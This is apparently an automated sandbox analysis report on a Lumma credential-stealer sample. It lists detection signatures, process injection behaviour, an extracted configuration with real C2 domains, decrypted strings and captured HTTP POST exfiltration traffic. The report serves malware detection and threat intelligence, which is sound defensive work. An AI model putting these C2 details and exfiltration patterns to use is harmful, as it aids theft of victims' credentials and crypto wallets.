Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ForcesLangi.exe

Overview

General Information

Sample name:ForcesLangi.exe
Analysis ID:1581499
MD5:64f1abe3f2f65e545c54b23809c06583
SHA1:8c32e992999dd0bf57cc45fed77c858cb4768a09
SHA256:05617db5aed9685ac891f4a7539294603640443b4ca5534abac163a544c574fa
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • ForcesLangi.exe (PID: 6588 cmdline: "C:\Users\user\Desktop\ForcesLangi.exe" MD5: 64F1ABE3F2F65E545C54B23809C06583)
    • conhost.exe (PID: 6564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_regiis.exe (PID: 4820 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["scentniej.buzz", "rebuildeso.buzz", "ingreem-eilish.biz", "screwamusresz.buzz", "cashfuzysao.buzz", "inherineau.buzz", "prisonyfork.buzz", "appliacnesot.buzz", "hummskitnj.buzz"], "Build id": "HpOoIh--aadb880da83d"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000002.00000003.1831814063.0000000002A74000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000003.1832206097.0000000002A7B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000002.00000003.1831883195.0000000002A7A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: aspnet_regiis.exe PID: 4820JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
              Process Memory Space: aspnet_regiis.exe PID: 4820JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 2 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T22:37:59.411853+010020283713Unknown Traffic192.168.2.44973092.122.104.90443TCP
                2024-12-27T22:38:01.942440+010020283713Unknown Traffic192.168.2.449731104.21.66.86443TCP
                2024-12-27T22:38:03.936184+010020283713Unknown Traffic192.168.2.449732104.21.66.86443TCP
                2024-12-27T22:38:06.368262+010020283713Unknown Traffic192.168.2.449733104.21.66.86443TCP
                2024-12-27T22:38:08.761026+010020283713Unknown Traffic192.168.2.449734104.21.66.86443TCP
                2024-12-27T22:38:13.131035+010020283713Unknown Traffic192.168.2.449735104.21.66.86443TCP
                2024-12-27T22:38:15.715385+010020283713Unknown Traffic192.168.2.449737104.21.66.86443TCP
                2024-12-27T22:38:17.788574+010020283713Unknown Traffic192.168.2.449739104.21.66.86443TCP
                2024-12-27T22:38:20.418310+010020283713Unknown Traffic192.168.2.449743104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T22:38:02.668693+010020546531A Network Trojan was detected192.168.2.449731104.21.66.86443TCP
                2024-12-27T22:38:04.707649+010020546531A Network Trojan was detected192.168.2.449732104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T22:38:02.668693+010020498361A Network Trojan was detected192.168.2.449731104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T22:38:04.707649+010020498121A Network Trojan was detected192.168.2.449732104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T22:38:19.549492+010020480941Malware Command and Control Activity Detected192.168.2.449739104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T22:38:00.287622+010028586661Domain Observed Used for C2 Detected192.168.2.44973092.122.104.90443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: https://lev-tolstoi.com:443/apipiAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/?#Avira URL Cloud: Label: malware
                Source: https://prisonyfork.buzz:443/apiAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/apiAAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/apiQ0O0qAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/api_qAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com:443/apiBAvira URL Cloud: Label: malware
                Source: https://appliacnesot.buzz:443/apiAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/apilAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com:443/apiZAvira URL Cloud: Label: malware
                Found malware configuration
                Source: ForcesLangi.exeMalware Configuration Extractor: LummaC {"C2 url": ["scentniej.buzz", "rebuildeso.buzz", "ingreem-eilish.biz", "screwamusresz.buzz", "cashfuzysao.buzz", "inherineau.buzz", "prisonyfork.buzz", "appliacnesot.buzz", "hummskitnj.buzz"], "Build id": "HpOoIh--aadb880da83d"}
                Multi AV Scanner detection for submitted file
                Source: ForcesLangi.exeReversingLabs: Detection: 52%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\gdi32.dllJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: ForcesLangi.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: ForcesLangi.exeString decryptor: hummskitnj.buzz
                Source: ForcesLangi.exeString decryptor: cashfuzysao.buzz
                Source: ForcesLangi.exeString decryptor: appliacnesot.buzz
                Source: ForcesLangi.exeString decryptor: screwamusresz.buzz
                Source: ForcesLangi.exeString decryptor: inherineau.buzz
                Source: ForcesLangi.exeString decryptor: scentniej.buzz
                Source: ForcesLangi.exeString decryptor: rebuildeso.buzz
                Source: ForcesLangi.exeString decryptor: prisonyfork.buzz
                Source: ForcesLangi.exeString decryptor: ingreem-eilish.biz
                Source: ForcesLangi.exeString decryptor: lid=%s&j=%s&ver=4.0
                Source: ForcesLangi.exeString decryptor: TeslaBrowser/5.5
                Source: ForcesLangi.exeString decryptor: - Screen Resoluton:
                Source: ForcesLangi.exeString decryptor: - Physical Installed Memory:
                Source: ForcesLangi.exeString decryptor: Workgroup: -
                Source: ForcesLangi.exeString decryptor: HpOoIh--aadb880da83d
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007357C0 CryptUnprotectData,2_2_007357C0
                Source: ForcesLangi.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 92.122.104.90:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49739 version: TLS 1.2
                Source: ForcesLangi.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE331E0 FindFirstFileExW,0_2_6CE331E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then lea esi, dword ptr [eax+00000270h]2_2_00728A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00741A10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h2_2_00760340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_0074D34A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edi, dword ptr [esi+30h]2_2_0072CC7A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, ebx2_2_00747440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+09AD4080h]2_2_00747440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-16h]2_2_00760D20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ebx2_2_00728600
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-16h]2_2_00761720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0074C850
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h2_2_00742830
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+04h]2_2_0075C830
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then push esi2_2_0072C805
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx2_2_0073B8F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx2_2_0073B8F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_0074C0E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov esi, ecx2_2_007490D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax2_2_0073D8D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax2_2_0073D8D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_0074E0DA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, ebx2_2_0073C8A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-000000BEh]2_2_0073C8A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edx+0Ah]2_2_0073C8A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2E3D7ACEh]2_2_0073C8A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax2_2_0073D8AC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax2_2_0073D8AC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_0074C09E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h2_2_0074B170
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax2_2_0074D17D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-16h]2_2_00761160
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_0074C09E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax2_2_0074D116
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h2_2_007489E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h2_2_007481CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp edx2_2_007439B9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax]2_2_007439B9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h2_2_0075C990
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0074B980
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ecx+ebx*8], 385488F2h2_2_0075CA40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then dec edx2_2_0075FA20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_00756210
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_0074AAC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+0Ah]2_2_0072AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then dec edx2_2_0075FB28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then dec edx2_2_0075FB2A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then dec edx2_2_0075FB10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax2_2_0073C300
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]2_2_007273D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]2_2_007273D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h2_2_007483D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-6E2DD57Fh]2_2_0073EB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0073747D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [edx], di2_2_0073747D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [eax+edi-74D5A7FEh]2_2_0074C465
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_0074C465
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h2_2_00734CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then dec edx2_2_0075FD70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+61765397h]2_2_0073B57D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx2_2_00746D2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h2_2_00748528
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh2_2_0075CDF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-3ECB279Fh]2_2_0075CDF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh2_2_0075CDF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7F7BECC6h2_2_0075CDF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_0074DDFF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [ebp+eax-46h]2_2_0075EDC1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edi, ecx2_2_0074A5B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax2_2_00742E6D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp edx2_2_00742E6D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax]2_2_00742E6D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_0074DE07
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then dec edx2_2_0075FE00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-16h]2_2_007606F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]2_2_00722EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx2_2_00749E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00736F52
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]2_2_00747740
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp eax2_2_00749739
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax2_2_0074BF13
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edi, dword ptr [esp+28h]2_2_00745F1B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp edx2_2_007437D6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dword ptr [esp+20h], eax2_2_00729780

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49732 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49730 -> 92.122.104.90:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49739 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.66.86:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: scentniej.buzz
                Source: Malware configuration extractorURLs: rebuildeso.buzz
                Source: Malware configuration extractorURLs: ingreem-eilish.biz
                Source: Malware configuration extractorURLs: screwamusresz.buzz
                Source: Malware configuration extractorURLs: cashfuzysao.buzz
                Source: Malware configuration extractorURLs: inherineau.buzz
                Source: Malware configuration extractorURLs: prisonyfork.buzz
                Source: Malware configuration extractorURLs: appliacnesot.buzz
                Source: Malware configuration extractorURLs: hummskitnj.buzz
                Source: Joe Sandbox ViewIP Address: 104.21.66.86 104.21.66.86
                Source: Joe Sandbox ViewIP Address: 92.122.104.90 92.122.104.90
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 92.122.104.90:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.66.86:443
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LEXMHB03TXM1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18134Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6G77YAN4O6JQCPPA9FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8791Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VTE315RFUWUZY5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20420Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LYXP6LOCU8472NMT2QZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1284Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=EZMLRP7PI78R7NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1110Host: lev-tolstoi.com
